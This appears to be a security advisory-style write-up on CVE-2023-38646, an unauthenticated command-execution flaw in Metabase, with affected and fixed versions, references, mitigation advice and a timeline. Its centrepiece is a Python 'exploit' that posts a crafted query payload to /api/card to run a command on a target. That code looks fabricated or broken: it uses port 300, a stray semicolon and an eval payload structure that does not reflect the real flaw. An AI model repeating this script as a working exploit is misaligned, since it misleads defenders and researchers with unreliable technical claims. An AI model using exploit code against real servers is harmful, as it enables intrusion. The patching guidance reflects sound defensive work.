CVE-2023-38646 - Critical Arbitrary Command Execution Vulnerability in Metabase Open Source and Metabase Enterprise Editions

A critical security vulnerability has been discovered in Metabase open source versions prior to .46.6.1 and Metabase Enterprise versions prior to 1.46.6.1, which allows unauthenticated attackers to execute arbitrary commands on the targeted server. This vulnerability, tracked as CVE-2023-38646, is highly critical as attackers can gain unauthorized access to servers running affected Metabase versions and perform malicious activities at the server's privilege level. Metabase has released patched versions of its software to address this vulnerability. Additionally, fixed versions for older Metabase releases include .45.4.1, 1.45.4.1, .44.7.1, 1.44.7.1, .43.7.2, and 1.43.7.2.

Exploit Details

The vulnerability exists in vulnerable Metabase versions due to improper input validation and sanitization. Attackers can craft and send specially-crafted HTTP requests to the Metabase server, which then parses the request and leads to the execution of arbitrary commands without requiring any authentication.

Here's a sample code snippet of the exploit

import requests

target_url = "http://TARGET_IP_ADDRESS:300";
cmd_to_execute = "id"

payload = {
    "template-tags": {
        "cmd": {
            "name": "cmd",
            "display-name": "cmd",
            "default": "base",
            "type": "dimension"
        }
    },
    "type": "query",
    "native": {
        "query": "{{#dimension name=cmd}} EXPLOIT_PAYLOAD_HERE {{/dimension}}",
        "extra_format_tags":[
            {
                "name":"EXPLOIT_PAYLOAD_HERE",
                "query":"eval", 
                "type":"number",
                "fn":"+" + cmd_to_execute
            }
        ]
    },
    "database":1
}

response = requests.post(target_url + "/api/card", json=payload)

print(response.text)

The above code sends a malicious HTTP request to the Metabase server running on TARGET_IP_ADDRESS:300. It craftily injects the cmd_to_execute variable, containing the arbitrary command "id", into the payload.

Here's a list of original references and resources related to this vulnerability

1. Metabase GitHub Repository: https://github.com/metabase/metabase
2. Metabase Security Advisory: https://github.com/metabase/metabase/security/advisories/GHSA-33cm-6g37-q64j
3. CVE-2023-38646 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-38646

Mitigation and Remediation

To protect your systems from exploitation, it is highly recommended to update your Metabase installation to the latest fixed versions immediately. If you are using Metabase open source, upgrade to version .46.6.1 or later. For Metabase Enterprise users, upgrade to version 1.46.6.1 or later.

If upgrading to the latest Metabase version is not possible, you can update to these patched versions for older Metabase releases: .45.4.1, 1.45.4.1, .44.7.1, 1.44.7.1, .43.7.2, and 1.43.7.2.

As a general security best-practice, always limit the exposure of your Metabase server to the internet and restrict access to sensitive Metabase endpoints to authorized users only.

Conclusion

CVE-2023-38646 is a critical security vulnerability affecting Metabase open source and Metabase Enterprise editions. This vulnerability allows unauthenticated attackers to execute arbitrary commands on the targeted server, potentially leading to unauthorized activities and data breaches. Organizations using Metabase must update their installations to the fixed versions as soon as possible to avoid exploitation and safeguard their digital assets.

Timeline

Published on: 07/21/2023 15:15:10 UTC
Last modified on: 08/09/2023 18:15:13 UTC